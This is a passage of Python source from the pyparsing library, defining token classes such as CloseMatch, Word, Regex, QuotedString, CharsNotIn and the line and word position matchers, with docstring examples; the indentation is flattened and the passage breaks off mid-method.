(Contrast with example for :class:`CaselessLiteral`.)
"""
def __init__(
self,
match_string: str = "",
ident_chars: OptionalType[str] = None,
*,
matchString: str = "",
identChars: OptionalType[str] = None,
):
identChars = identChars or ident_chars
match_string = matchString or match_string
super().__init__(match_string, identChars, caseless=True)
class CloseMatch(Token):
"""A variation on :class:`Literal` which matches "close" matches,
that is, strings with at most 'n' mismatching characters.
:class:`CloseMatch` takes parameters:
- ``match_string`` - string to be matched
- ``caseless`` - a boolean indicating whether to ignore casing when comparing characters
- ``max_mismatches`` - (``default=1``) maximum number of
mismatches allowed to count as a match
The results from a successful parse will contain the matched text
from the input string and the following named results:
- ``mismatches`` - a list of the positions within the
match_string where mismatches were found
- ``original`` - the original match_string used to compare
against the input string
If ``mismatches`` is an empty list, then the match was an exact
match.
Example::
patt = CloseMatch("ATCATCGAATGGA")
patt.parse_string("ATCATCGAAXGGA") # -> (['ATCATCGAAXGGA'], {'mismatches': [[9]], 'original': ['ATCATCGAATGGA']})
patt.parse_string("ATCAXCGAAXGGA") # -> Exception: Expected 'ATCATCGAATGGA' (with up to 1 mismatches) (at char 0), (line:1, col:1)
# exact match
patt.parse_string("ATCATCGAATGGA") # -> (['ATCATCGAATGGA'], {'mismatches': [[]], 'original': ['ATCATCGAATGGA']})
# close match allowing up to 2 mismatches
patt = CloseMatch("ATCATCGAATGGA", max_mismatches=2)
patt.parse_string("ATCAXCGAAXGGA") # -> (['ATCAXCGAAXGGA'], {'mismatches': [[4, 9]], 'original': ['ATCATCGAATGGA']})
"""
def __init__(
self,
match_string: str,
max_mismatches: int = None,
*,
maxMismatches: int = 1,
caseless=False,
):
maxMismatches = max_mismatches if max_mismatches is not None else maxMismatches
super().__init__()
self.match_string = match_string
self.maxMismatches = maxMismatches
self.errmsg = "Expected {!r} (with up to {} mismatches)".format(
self.match_string, self.maxMismatches
)
self.caseless = caseless
self.mayIndexError = False
self.mayReturnEmpty = False
def _generateDefaultName(self):
return "{}:{!r}".format(type(self).__name__, self.match_string)
def parseImpl(self, instring, loc, doActions=True):
start = loc
instrlen = len(instring)
maxloc = start + len(self.match_string)
if maxloc <= instrlen:
match_string = self.match_string
match_stringloc = 0
mismatches = []
maxMismatches = self.maxMismatches
for match_stringloc, s_m in enumerate(
zip(instring[loc:maxloc], match_string)
):
src, mat = s_m
if self.caseless:
src, mat = src.lower(), mat.lower()
if src != mat:
mismatches.append(match_stringloc)
if len(mismatches) > maxMismatches:
break
else:
loc = start + match_stringloc + 1
results = ParseResults([instring[start:loc]])
results["original"] = match_string
results["mismatches"] = mismatches
return loc, results
raise ParseException(instring, loc, self.errmsg, self)
class Word(Token):
"""Token for matching words composed of allowed character sets.
Parameters:
- ``init_chars`` - string of all characters that should be used to
match as a word; "ABC" will match "AAA", "ABAB", "CBAC", etc.;
if ``body_chars`` is also specified, then this is the string of
initial characters
- ``body_chars`` - string of characters that
can be used for matching after a matched initial character as
given in ``init_chars``; if omitted, same as the initial characters
(default=``None``)
- ``min`` - minimum number of characters to match (default=1)
- ``max`` - maximum number of characters to match (default=0)
- ``exact`` - exact number of characters to match (default=0)
- ``as_keyword`` - match as a keyword (default=``False``)
- ``exclude_chars`` - characters that might be
found in the input ``body_chars`` string but which should not be
accepted for matching; useful to define a word of all
printables except for one or two characters, for instance
(default=``None``)
:class:`srange` is useful for defining custom character set strings
for defining :class:`Word` expressions, using range notation from
regular expression character sets.
A common mistake is to use :class:`Word` to match a specific literal
string, as in ``Word("Address")``. Remember that :class:`Word`
uses the string argument to define *sets* of matchable characters.
This expression would match "Add", "AAA", "dAred", or any other word
made up of the characters 'A', 'd', 'r', 'e', and 's'. To match an
exact literal string, use :class:`Literal` or :class:`Keyword`.
pyparsing includes helper strings for building Words:
- :class:`alphas`
- :class:`nums`
- :class:`alphanums`
- :class:`hexnums`
- :class:`alphas8bit` (alphabetic characters in ASCII range 128-255
- accented, tilded, umlauted, etc.)
- :class:`punc8bit` (non-alphabetic characters in ASCII range
128-255 - currency, symbols, superscripts, diacriticals, etc.)
- :class:`printables` (any non-whitespace character)
``alphas``, ``nums``, and ``printables`` are also defined in several
Unicode sets - see :class:`pyparsing_unicode`.
Example::
# a word composed of digits
integer = Word(nums) # equivalent to Word("0123456789") or Word(srange("0-9"))
# a word with a leading capital, and zero or more lowercase
capital_word = Word(alphas.upper(), alphas.lower())
# hostnames are alphanumeric, with leading alpha, and '-'
hostname = Word(alphas, alphanums + '-')
# roman numeral (not a strict parser, accepts invalid mix of characters)
roman = Word("IVXLCDM")
# any string of non-whitespace characters, except for ','
csv_value = Word(printables, exclude_chars=",")
"""
def __init__(
self,
init_chars: str = "",
body_chars: OptionalType[str] = None,
min: int = 1,
max: int = 0,
exact: int = 0,
as_keyword: bool = False,
exclude_chars: OptionalType[str] = None,
*,
initChars: OptionalType[str] = None,
bodyChars: OptionalType[str] = None,
asKeyword: bool = False,
excludeChars: OptionalType[str] = None,
):
initChars = initChars or init_chars
bodyChars = bodyChars or body_chars
asKeyword = asKeyword or as_keyword
excludeChars = excludeChars or exclude_chars
super().__init__()
if not initChars:
raise ValueError(
"invalid {}, initChars cannot be empty string".format(
type(self).__name__
)
)
initChars = set(initChars)
self.initChars = initChars
if excludeChars:
excludeChars = set(excludeChars)
initChars -= excludeChars
if bodyChars:
bodyChars = set(bodyChars) - excludeChars
self.initCharsOrig = "".join(sorted(initChars))
if bodyChars:
self.bodyCharsOrig = "".join(sorted(bodyChars))
self.bodyChars = set(bodyChars)
else:
self.bodyCharsOrig = "".join(sorted(initChars))
self.bodyChars = set(initChars)
self.maxSpecified = max > 0
if min < 1:
raise ValueError(
"cannot specify a minimum length < 1; use Opt(Word()) if zero-length word is permitted"
)
self.minLen = min
if max > 0:
self.maxLen = max
else:
self.maxLen = _MAX_INT
if exact > 0:
self.maxLen = exact
self.minLen = exact
self.errmsg = "Expected " + self.name
self.mayIndexError = False
self.asKeyword = asKeyword
# see if we can make a regex for this Word
if " " not in self.initChars | self.bodyChars and (min == 1 and exact == 0):
if self.bodyChars == self.initChars:
if max == 0:
repeat = "+"
elif max == 1:
repeat = ""
else:
repeat = "{{{},{}}}".format(
self.minLen, "" if self.maxLen == _MAX_INT else self.maxLen
)
self.reString = "[{}]{}".format(
_collapse_string_to_ranges(self.initChars),
repeat,
)
elif len(self.initChars) == 1:
if max == 0:
repeat = "*"
else:
repeat = "{{0,{}}}".format(max - 1)
self.reString = "{}[{}]{}".format(
re.escape(self.initCharsOrig),
_collapse_string_to_ranges(self.bodyChars),
repeat,
)
else:
if max == 0:
repeat = "*"
elif max == 2:
repeat = ""
else:
repeat = "{{0,{}}}".format(max - 1)
self.reString = "[{}][{}]{}".format(
_collapse_string_to_ranges(self.initChars),
_collapse_string_to_ranges(self.bodyChars),
repeat,
)
if self.asKeyword:
self.reString = r"\b" + self.reString + r"\b"
try:
self.re = re.compile(self.reString)
except sre_constants.error:
self.re = None
else:
self.re_match = self.re.match
self.__class__ = _WordRegex
def _generateDefaultName(self):
def charsAsStr(s):
max_repr_len = 16
s = _collapse_string_to_ranges(s, re_escape=False)
if len(s) > max_repr_len:
return s[: max_repr_len - 3] + "..."
else:
return s
if self.initChars != self.bodyChars:
base = "W:({}, {})".format(
charsAsStr(self.initChars), charsAsStr(self.bodyChars)
)
else:
base = "W:({})".format(charsAsStr(self.initChars))
# add length specification
if self.minLen > 1 or self.maxLen != _MAX_INT:
if self.minLen == self.maxLen:
if self.minLen == 1:
return base[2:]
else:
return base + "{{{}}}".format(self.minLen)
elif self.maxLen == _MAX_INT:
return base + "{{{},...}}".format(self.minLen)
else:
return base + "{{{},{}}}".format(self.minLen, self.maxLen)
return base
def parseImpl(self, instring, loc, doActions=True):
if instring[loc] not in self.initChars:
raise ParseException(instring, loc, self.errmsg, self)
start = loc
loc += 1
instrlen = len(instring)
bodychars = self.bodyChars
maxloc = start + self.maxLen
maxloc = min(maxloc, instrlen)
while loc < maxloc and instring[loc] in bodychars:
loc += 1
throwException = False
if loc - start < self.minLen:
throwException = True
elif self.maxSpecified and loc < instrlen and instring[loc] in bodychars:
throwException = True
elif self.asKeyword:
if (
start > 0
and instring[start - 1] in bodychars
or loc < instrlen
and instring[loc] in bodychars
):
throwException = True
if throwException:
raise ParseException(instring, loc, self.errmsg, self)
return loc, instring[start:loc]
class _WordRegex(Word):
def parseImpl(self, instring, loc, doActions=True):
result = self.re_match(instring, loc)
if not result:
raise ParseException(instring, loc, self.errmsg, self)
loc = result.end()
return loc, result.group()
class Char(_WordRegex):
"""A short-cut class for defining :class:`Word` ``(characters, exact=1)``,
when defining a match of any single character in a string of
characters.
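Example (an illustrative sketch)::
    sign = Char("+-")
    sign.parse_string("-123")   # -> ['-']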
"""
def __init__(
self,
charset: str,
as_keyword: bool = False,
exclude_chars: OptionalType[str] = None,
*,
asKeyword: bool = False,
excludeChars: OptionalType[str] = None,
):
asKeyword = asKeyword or as_keyword
excludeChars = excludeChars or exclude_chars
super().__init__(
charset, exact=1, asKeyword=asKeyword, excludeChars=excludeChars
)
self.reString = "[{}]".format(_collapse_string_to_ranges(self.initChars))
if asKeyword:
self.reString = r"\b{}\b".format(self.reString)
self.re = re.compile(self.reString)
self.re_match = self.re.match
class Regex(Token):
r"""Token for matching strings that match a given regular
expression. Defined with string specifying the regular expression in
a form recognized by the stdlib Python `re module <https://docs.python.org/3/library/re.html>`_.
If the given regex contains named groups (defined using ``(?P<name>...)``),
these will be preserved as named :class:`ParseResults`.
If instead of the Python stdlib ``re`` module you wish to use a different RE module
(such as the ``regex`` module), you can do so by building your ``Regex`` object with
a compiled RE that was compiled using ``regex``.
Example::
realnum = Regex(r"[+-]?\d+\.\d*")
# ref: https://stackoverflow.com/questions/267399/how-do-you-match-only-valid-roman-numerals-with-a-regular-expression
roman = Regex(r"M{0,4}(CM|CD|D?C{0,3})(XC|XL|L?X{0,3})(IX|IV|V?I{0,3})")
# named fields in a regex will be returned as named results
date = Regex(r'(?P<year>\d{4})-(?P<month>\d\d?)-(?P<day>\d\d?)')
# the Regex class will accept re's compiled using the regex module
import regex
parser = pp.Regex(regex.compile(r'[0-9]'))
"""
def __init__(
self,
pattern: Any,
flags: Union[re.RegexFlag, int] = 0,
as_group_list: bool = False,
as_match: bool = False,
*,
asGroupList: bool = False,
asMatch: bool = False,
):
"""The parameters ``pattern`` and ``flags`` are passed
to the ``re.compile()`` function as-is. See the Python
`re module <https://docs.python.org/3/library/re.html>`_ module for an
explanation of the acceptable patterns and flags.
"""
super().__init__()
asGroupList = asGroupList or as_group_list
asMatch = asMatch or as_match
if isinstance(pattern, str_type):
if not pattern:
raise ValueError("null string passed to Regex; use Empty() instead")
self.pattern = pattern
self.flags = flags
try:
self.re = re.compile(self.pattern, self.flags)
self.reString = self.pattern
except sre_constants.error:
raise ValueError(
"invalid pattern ({!r}) passed to Regex".format(pattern)
)
elif hasattr(pattern, "pattern") and hasattr(pattern, "match"):
self.re = pattern
self.pattern = self.reString = pattern.pattern
self.flags = flags
else:
raise TypeError(
"Regex may only be constructed with a string or a compiled RE object"
)
self.re_match = self.re.match
self.errmsg = "Expected " + self.name
self.mayIndexError = False
self.mayReturnEmpty = self.re_match("") is not None
self.asGroupList = asGroupList
self.asMatch = asMatch
if self.asGroupList:
self.parseImpl = self.parseImplAsGroupList
if self.asMatch:
self.parseImpl = self.parseImplAsMatch
def _generateDefaultName(self):
return "Re:({})".format(repr(self.pattern).replace("\\\\", "\\"))
def parseImpl(self, instring, loc, doActions=True):
result = self.re_match(instring, loc)
if not result:
raise ParseException(instring, loc, self.errmsg, self)
loc = result.end()
ret = ParseResults(result.group())
d = result.groupdict()
if d:
for k, v in d.items():
ret[k] = v
return loc, ret
def parseImplAsGroupList(self, instring, loc, doActions=True):
result = self.re_match(instring, loc)
if not result:
raise ParseException(instring, loc, self.errmsg, self)
loc = result.end()
ret = result.groups()
return loc, ret
def parseImplAsMatch(self, instring, loc, doActions=True):
result = self.re_match(instring, loc)
if not result:
raise ParseException(instring, loc, self.errmsg, self)
loc = result.end()
ret = result
return loc, ret
def sub(self, repl):
r"""
Return :class:`Regex` with an attached parse action to transform the parsed
result as if called using `re.sub(expr, repl, string) <https://docs.python.org/3/library/re.html#re.sub>`_.
Example::
make_html = Regex(r"(\w+):(.*?):").sub(r"<\1>\2</\1>")
print(make_html.transform_string("h1:main title:"))
# prints "<h1>main title</h1>"
"""
if self.asGroupList:
raise TypeError("cannot use sub() with Regex(asGroupList=True)")
if self.asMatch and callable(repl):
raise TypeError("cannot use sub() with a callable with Regex(asMatch=True)")
if self.asMatch:
def pa(tokens):
return tokens[0].expand(repl)
else:
def pa(tokens):
return self.re.sub(repl, tokens[0])
return self.add_parse_action(pa)
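# Illustrative usage sketch (added note): named groups in the pattern become named
# results, while as_group_list / as_match change what parseImpl returns (a tuple of
# groups or the re.Match object, respectively); sub() attaches a re.sub-style
# replacement parse action.
#
#   date = Regex(r"(?P<year>\d{4})-(?P<month>\d\d)-(?P<day>\d\d)")
#   result = date.parse_string("2021-12-31")
#   result["year"], result["month"], result["day"]    # -> ('2021', '12', '31')
#
#   bold = Regex(r"\*\*(.*?)\*\*").sub(r"<b>\1</b>")
#   bold.transform_string("**bold** text")            # -> '<b>bold</b> text'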
class QuotedString(Token):
r"""
Token for matching strings that are delimited by quoting characters.
Defined with the following parameters:
- ``quote_char`` - string of one or more characters defining the
quote delimiting string
- ``esc_char`` - character to escape quotes, typically backslash
(default= ``None``)
- ``esc_quote`` - special quote sequence to escape an embedded quote
string (such as SQL's ``""`` to escape an embedded ``"``)
(default= ``None``)
- ``multiline`` - boolean indicating whether quotes can span
multiple lines (default= ``False``)
- ``unquote_results`` - boolean indicating whether the matched text
should be unquoted (default= ``True``)
- ``end_quote_char`` - string of one or more characters defining the
end of the quote delimited string (default= ``None`` => same as
quote_char)
- ``convert_whitespace_escapes`` - convert escaped whitespace
(``'\t'``, ``'\n'``, etc.) to actual whitespace
(default= ``True``)
Example::
qs = QuotedString('"')
print(qs.search_string('lsjdf "This is the quote" sldjf'))
complex_qs = QuotedString('{{', end_quote_char='}}')
print(complex_qs.search_string('lsjdf {{This is the "quote"}} sldjf'))
sql_qs = QuotedString('"', esc_quote='""')
print(sql_qs.search_string('lsjdf "This is the quote with ""embedded"" quotes" sldjf'))
prints::
[['This is the quote']]
[['This is the "quote"']]
[['This is the quote with "embedded" quotes']]
"""
ws_map = ((r"\t", "\t"), (r"\n", "\n"), (r"\f", "\f"), (r"\r", "\r"))
def __init__(
self,
quote_char: str = "",
esc_char: OptionalType[str] = None,
esc_quote: OptionalType[str] = None,
multiline: bool = False,
unquote_results: bool = True,
end_quote_char: OptionalType[str] = None,
convert_whitespace_escapes: bool = True,
*,
quoteChar: str = "",
escChar: OptionalType[str] = None,
escQuote: OptionalType[str] = None,
unquoteResults: bool = True,
endQuoteChar: OptionalType[str] = None,
convertWhitespaceEscapes: bool = True,
):
super().__init__()
escChar = escChar or esc_char
escQuote = escQuote or esc_quote
unquoteResults = unquoteResults and unquote_results
endQuoteChar = endQuoteChar or end_quote_char
convertWhitespaceEscapes = (
convertWhitespaceEscapes and convert_whitespace_escapes
)
quote_char = quoteChar or quote_char
# remove whitespace from quote chars - won't work anyway
quote_char = quote_char.strip()
if not quote_char:
raise ValueError("quote_char cannot be the empty string")
if endQuoteChar is None:
endQuoteChar = quote_char
else:
endQuoteChar = endQuoteChar.strip()
if not endQuoteChar:
raise ValueError("endQuoteChar cannot be the empty string")
self.quoteChar = quote_char
self.quoteCharLen = len(quote_char)
self.firstQuoteChar = quote_char[0]
self.endQuoteChar = endQuoteChar
self.endQuoteCharLen = len(endQuoteChar)
self.escChar = escChar
self.escQuote = escQuote
self.unquoteResults = unquoteResults
self.convertWhitespaceEscapes = convertWhitespaceEscapes
sep = ""
inner_pattern = ""
if escQuote:
inner_pattern += r"{}(?:{})".format(sep, re.escape(escQuote))
sep = "|"
if escChar:
inner_pattern += r"{}(?:{}.)".format(sep, re.escape(escChar))
sep = "|"
self.escCharReplacePattern = re.escape(self.escChar) + "(.)"
if len(self.endQuoteChar) > 1:
inner_pattern += (
"{}(?:".format(sep)
+ "|".join(
"(?:{}(?!{}))".format(
re.escape(self.endQuoteChar[:i]),
_escape_regex_range_chars(self.endQuoteChar[i:]),
)
for i in range(len(self.endQuoteChar) - 1, 0, -1)
)
+ ")"
)
sep = "|"
if multiline:
self.flags = re.MULTILINE | re.DOTALL
inner_pattern += r"{}(?:[^{}{}])".format(
sep,
_escape_regex_range_chars(self.endQuoteChar[0]),
(_escape_regex_range_chars(escChar) if escChar is not None else ""),
)
else:
self.flags = 0
inner_pattern += r"{}(?:[^{}\n\r{}])".format(
sep,
_escape_regex_range_chars(self.endQuoteChar[0]),
(_escape_regex_range_chars(escChar) if escChar is not None else ""),
)
self.pattern = "".join(
[
re.escape(self.quoteChar),
"(?:",
inner_pattern,
")*",
re.escape(self.endQuoteChar),
]
)
try:
self.re = re.compile(self.pattern, self.flags)
self.reString = self.pattern
self.re_match = self.re.match
except sre_constants.error:
raise ValueError(
"invalid pattern {!r} passed to Regex".format(self.pattern)
)
self.errmsg = "Expected " + self.name
self.mayIndexError = False
self.mayReturnEmpty = True
def _generateDefaultName(self):
if self.quoteChar == self.endQuoteChar and isinstance(self.quoteChar, str_type):
return "string enclosed in {!r}".format(self.quoteChar)
return "quoted string, starting with {} ending with {}".format(
self.quoteChar, self.endQuoteChar
)
def parseImpl(self, instring, loc, doActions=True):
result = (
instring[loc] == self.firstQuoteChar
and self.re_match(instring, loc)
or None
)
if not result:
raise ParseException(instring, loc, self.errmsg, self)
loc = result.end()
ret = result.group()
if self.unquoteResults:
# strip off quotes
ret = ret[self.quoteCharLen : -self.endQuoteCharLen]
if isinstance(ret, str_type):
# replace escaped whitespace
if "\\" in ret and self.convertWhitespaceEscapes:
for wslit, wschar in self.ws_map:
ret = ret.replace(wslit, wschar)
# replace escaped characters
if self.escChar:
ret = re.sub(self.escCharReplacePattern, r"\g<1>", ret)
# replace escaped quotes
if self.escQuote:
ret = ret.replace(self.escQuote, self.endQuoteChar)
return loc, ret
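# Illustrative usage sketch (added note): with unquote_results=True (the default),
# the surrounding quotes are stripped and any esc_char / esc_quote sequences are
# replaced in the returned token.
#
#   qs = QuotedString('"', esc_char="\\")
#   qs.parse_string(r'"a \"quoted\" word"')      # -> ['a "quoted" word']
#
#   sql = QuotedString("'", esc_quote="''")
#   sql.parse_string("'it''s quoted'")           # -> ["it's quoted"]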
class CharsNotIn(Token):
"""Token for matching words composed of characters *not* in a given
set (will include whitespace in matched characters if not listed in
the provided exclusion set - see example). Defined with string
containing all disallowed characters, and an optional minimum,
maximum, and/or exact length. The default value for ``min`` is
1 (a minimum value < 1 is not valid); the default values for
``max`` and ``exact`` are 0, meaning no maximum or exact
length restriction.
Example::
# define a comma-separated-value as anything that is not a ','
csv_value = CharsNotIn(',')
print(delimited_list(csv_value).parse_string("dkls,lsdkjf,s12 34,@!#,213"))
prints::
['dkls', 'lsdkjf', 's12 34', '@!#', '213']
"""
def __init__(
self,
not_chars: str = "",
min: int = 1,
max: int = 0,
exact: int = 0,
*,
notChars: str = "",
):
super().__init__()
self.skipWhitespace = False
self.notChars = not_chars or notChars
self.notCharsSet = set(self.notChars)
if min < 1:
raise ValueError(
"cannot specify a minimum length < 1; use "
"Opt(CharsNotIn()) if zero-length char group is permitted"
)
self.minLen = min
if max > 0:
self.maxLen = max
else:
self.maxLen = _MAX_INT
if exact > 0:
self.maxLen = exact
self.minLen = exact
self.errmsg = "Expected " + self.name
self.mayReturnEmpty = self.minLen == 0
self.mayIndexError = False
def _generateDefaultName(self):
not_chars_str = _collapse_string_to_ranges(self.notChars)
if len(not_chars_str) > 16:
return "!W:({}...)".format(self.notChars[: 16 - 3])
else:
return "!W:({})".format(self.notChars)
def parseImpl(self, instring, loc, doActions=True):
notchars = self.notCharsSet
if instring[loc] in notchars:
raise ParseException(instring, loc, self.errmsg, self)
start = loc
loc += 1
maxlen = min(start + self.maxLen, len(instring))
while loc < maxlen and instring[loc] not in notchars:
loc += 1
if loc - start < self.minLen:
raise ParseException(instring, loc, self.errmsg, self)
return loc, instring[start:loc]
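# Illustrative usage sketch (added note): CharsNotIn matches runs of characters
# *excluded* from the given set, and does not skip leading whitespace, which makes
# it handy for grabbing free-form cell contents.
#
#   csv_value = CharsNotIn(",\n")
#   delimited_list(csv_value).parse_string("a b, c d,e")   # -> ['a b', ' c d', 'e']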
class White(Token):
"""Special matching class for matching whitespace. Normally,
whitespace is ignored by pyparsing grammars. This class is included
when some whitespace structures are significant. Define with
a string containing the whitespace characters to be matched; default
is ``" \\t\\r\\n"``. Also takes optional ``min``,
``max``, and ``exact`` arguments, as defined for the
:class:`Word` class.
"""
whiteStrs = {
" ": "<SP>",
"\t": "<TAB>",
"\n": "<LF>",
"\r": "<CR>",
"\f": "<FF>",
"\u00A0": "<NBSP>",
"\u1680": "<OGHAM_SPACE_MARK>",
"\u180E": "<MONGOLIAN_VOWEL_SEPARATOR>",
"\u2000": "<EN_QUAD>",
"\u2001": "<EM_QUAD>",
"\u2002": "<EN_SPACE>",
"\u2003": "<EM_SPACE>",
"\u2004": "<THREE-PER-EM_SPACE>",
"\u2005": "<FOUR-PER-EM_SPACE>",
"\u2006": "<SIX-PER-EM_SPACE>",
"\u2007": "<FIGURE_SPACE>",
"\u2008": "<PUNCTUATION_SPACE>",
"\u2009": "<THIN_SPACE>",
"\u200A": "<HAIR_SPACE>",
"\u200B": "<ZERO_WIDTH_SPACE>",
"\u202F": "<NNBSP>",
"\u205F": "<MMSP>",
"\u3000": "<IDEOGRAPHIC_SPACE>",
}
def __init__(self, ws: str = " \t\r\n", min: int = 1, max: int = 0, exact: int = 0):
super().__init__()
self.matchWhite = ws
self.set_whitespace_chars(
"".join(c for c in self.whiteChars if c not in self.matchWhite),
copy_defaults=True,
)
# self.leave_whitespace()
self.mayReturnEmpty = True
self.errmsg = "Expected " + self.name
self.minLen = min
if max > 0:
self.maxLen = max
else:
self.maxLen = _MAX_INT
if exact > 0:
self.maxLen = exact
self.minLen = exact
def _generateDefaultName(self):
return "".join(White.whiteStrs[c] for c in self.matchWhite)
def parseImpl(self, instring, loc, doActions=True):
if instring[loc] not in self.matchWhite:
raise ParseException(instring, loc, self.errmsg, self)
start = loc
loc += 1
maxloc = start + self.maxLen
maxloc = min(maxloc, len(instring))
while loc < maxloc and instring[loc] in self.matchWhite:
loc += 1
if loc - start < self.minLen:
raise ParseException(instring, loc, self.errmsg, self)
return loc, instring[start:loc]
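# Illustrative usage sketch (added note): White turns otherwise-skipped whitespace
# into an explicit token; the matched characters are removed from the expression's
# own whitespace-skipping set so they are returned rather than ignored.
#
#   tab = White("\t")
#   field_pair = Word(alphas) + tab + Word(alphas)
#   field_pair.parse_string("name\tvalue")   # -> ['name', '\t', 'value']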
class PositionToken(Token):
def __init__(self):
super().__init__()
self.mayReturnEmpty = True
self.mayIndexError = False
class GoToColumn(PositionToken):
"""Token to advance to a specific column of input text; useful for
tabular report scraping.
"""
def __init__(self, colno: int):
super().__init__()
self.col = colno
def preParse(self, instring, loc):
if col(loc, instring) != self.col:
instrlen = len(instring)
if self.ignoreExprs:
loc = self._skipIgnorables(instring, loc)
while (
loc < instrlen
and instring[loc].isspace()
and col(loc, instring) != self.col
):
loc += 1
return loc
def parseImpl(self, instring, loc, doActions=True):
thiscol = col(loc, instring)
if thiscol > self.col:
raise ParseException(instring, loc, "Text not in expected column", self)
newloc = loc + self.col - thiscol
ret = instring[loc:newloc]
return newloc, ret
class LineStart(PositionToken):
r"""Matches if current position is at the beginning of a line within
the parse string
Example::
test = '''\
AAA this line
AAA and this line
AAA but not this one
B AAA and definitely not this one
'''
for t in (LineStart() + 'AAA' + restOfLine).search_string(test):
print(t)
prints::
['AAA', ' this line']
['AAA', ' and this line']
"""
def __init__(self):
super().__init__()
self.leave_whitespace()
self.orig_whiteChars = set() | self.whiteChars
self.whiteChars.discard("\n")
self.skipper = Empty().set_whitespace_chars(self.whiteChars)
self.errmsg = "Expected start of line"
def preParse(self, instring, loc):
if loc == 0:
return loc
else:
ret = self.skipper.preParse(instring, loc)
if "\n" in self.orig_whiteChars:
while instring[ret : ret + 1] == "\n":
ret = self.skipper.preParse(instring, ret + 1)
return ret
def parseImpl(self, instring, loc, doActions=True):
if col(loc, instring) == 1:
return loc, []
raise ParseException(instring, loc, self.errmsg, self)
class LineEnd(PositionToken):
"""Matches if current position is at the end of a line within the
parse string
"""
def __init__(self):
super().__init__()
self.whiteChars.discard("\n")
self.set_whitespace_chars(self.whiteChars, copy_defaults=False)
self.errmsg = "Expected end of line"
def parseImpl(self, instring, loc, doActions=True):
if loc < len(instring):
if instring[loc] == "\n":
return loc + 1, "\n"
else:
raise ParseException(instring, loc, self.errmsg, self)
elif loc == len(instring):
return loc + 1, []
else:
raise ParseException(instring, loc, self.errmsg, self)
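# Illustrative usage sketch (added note): LineEnd consumes the newline (returning
# "\n") or matches at end of input, so it can anchor one-record-per-line grammars.
#
#   key_value = Word(alphas)("key") + Suppress("=") + restOfLine("value") + LineEnd().suppress()
#   key_value.search_string("a=1\nb=2\n")    # -> [['a', '1'], ['b', '2']]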
class StringStart(PositionToken):
"""Matches if current position is at the beginning of the parse
string
"""
def __init__(self):
super().__init__()
self.errmsg = "Expected start of text"
def parseImpl(self, instring, loc, doActions=True):
if loc != 0:
# see if entire string up to here is just whitespace and ignoreables
if loc != self.preParse(instring, 0):
raise ParseException(instring, loc, self.errmsg, self)
return loc, []
class StringEnd(PositionToken):
"""
Matches if current position is at the end of the parse string
"""
def __init__(self):
super().__init__()
self.errmsg = "Expected end of text"
def parseImpl(self, instring, loc, doActions=True):
if loc < len(instring):
raise ParseException(instring, loc, self.errmsg, self)
elif loc == len(instring):
return loc + 1, []
elif loc > len(instring):
return loc, []
else:
raise ParseException(instring, loc, self.errmsg, self)
class WordStart(PositionToken):
"""Matches if the current position is at the beginning of a
:class:`Word`, and is not preceded by any character in a given
set of ``word_chars`` (default= ``printables``). To emulate the
``\b`` behavior of regular expressions, use
``WordStart(alphanums)``. ``WordStart`` will also match at
the beginning of the string being parsed, or at the beginning of
a line.
"""
def __init__(self, word_chars: str = printables, *, wordChars: str = printables):
wordChars = word_chars if wordChars == printables else wordChars
super().__init__()
self.wordChars = set(wordChars)
self.errmsg = "Not at the start of a word"
def parseImpl(self, instring, loc, doActions=True):
if loc != 0:
if (
instring[loc - 1] in self.wordChars
or instring[loc] not in self.wordChars
):
raise ParseException(instring, loc, self.errmsg, self)
return loc, []
class WordEnd(PositionToken):
"""Matches if the current position is at the end of a :class:`Word`,
and is not followed by any character in a given set of ``word_chars``
(default= ``printables``). To emulate the ``\b`` behavior of
regular expressions, use ``WordEnd(alphanums)``. ``WordEnd``
will also match at the end of the string being parsed, or at the end
of a line.
"""
def __init__(self, word_chars: str = printables, *, wordChars: str = printables):
wordChars = word_chars if wordChars == printables else wordChars
super().__init__()
self.wordChars = set(wordChars)
self.skipWhitespace = False
self.errmsg = "Not at the end of a word"
def parseImpl(self, instring, loc, doActions=True):
instrlen = len(instring)
if instrlen > 0 and loc < instrlen:
if (
instring[loc] in self.wordChars
or instring[loc - 1] not in self.wordChars
):
raise ParseException(instring, loc, self.errmsg, self)
return loc, []
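# Illustrative usage sketch (added note): WordStart/WordEnd give \b-like word
# boundary behavior for a configurable character set.
#
#   whole_cat = WordStart(alphanums) + Literal("cat") + WordEnd(alphanums)
#   whole_cat.search_string("cat catalog concat cat")   # matches only the standalone 'cat's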
class ParseExpression(ParserElement):
"""Abstract subclass of ParserElement, for combining and
post-processing parsed tokens.
"""
def __init__(self, exprs: IterableType[ParserElement], savelist: bool = False):
super().__init__(savelist)
self.exprs: List[ParserElement]
if isinstance(exprs, _generatorType):
exprs = list(exprs)
if isinstance(exprs, str_type):
self.exprs = [self._literalStringClass(exprs)]
elif isinstance(exprs, ParserElement):
self.exprs = [exprs]
elif isinstance(exprs, Iterable):
exprs = list(exprs)
# if sequence of strings provided, wrap with Literal
if any(isinstance(expr, str_type) for expr in exprs):
exprs = (
self._literalStringClass(e) if isinstance(e, str_type) else e
for e in exprs
)
self.exprs = list(exprs)
else:
try:
self.exprs = list(exprs)
except TypeError:
self.exprs = [exprs]
self.callPreparse = False
def recurse(self):
return self.exprs[:]
def append(self, other):
self.exprs.append(other)
self._defaultName = None
return self
def leave_whitespace(self, recursive=True):
"""
Extends ``leave_whitespace`` defined in base class, and also invokes ``leave_whitespace`` on
all contained expressions.
"""
super().leave_whitespace(recursive)
if recursive:
self.exprs = [e.copy() for e in self.exprs]
for e in self.exprs:
e.leave_whitespace(recursive)
return self
def ignore_whitespace(self, recursive=True):
"""
Extends ``ignore_whitespace`` defined in base class, and also invokes ``ignore_whitespace`` on
all contained expressions.
"""
super().ignore_whitespace(recursive)
if recursive:
self.exprs = [e.copy() for e in self.exprs]
for e in self.exprs:
e.ignore_whitespace(recursive)
return self
def ignore(self, other):
if isinstance(other, Suppress):
if other not in self.ignoreExprs:
super().ignore(other)
for e in self.exprs:
e.ignore(self.ignoreExprs[-1])
else:
super().ignore(other)
for e in self.exprs:
e.ignore(self.ignoreExprs[-1])
return self
def _generateDefaultName(self):
return "{}:({})".format(self.__class__.__name__, str(self.exprs))
def streamline(self):
if self.streamlined:
return self
super().streamline()
for e in self.exprs:
e.streamline()
# collapse nested :class:`And`'s of the form ``And(And(And(a, b), c), d)`` to ``And(a, b, c, d)``
# but only if there are no parse actions or resultsNames on the nested And's
# (likewise for :class:`Or`'s and :class:`MatchFirst`'s)
if len(self.exprs) == 2:
other = self.exprs[0]
if (
isinstance(other, self.__class__)
and not other.parseAction
and other.resultsName is None
and not other.debug
):
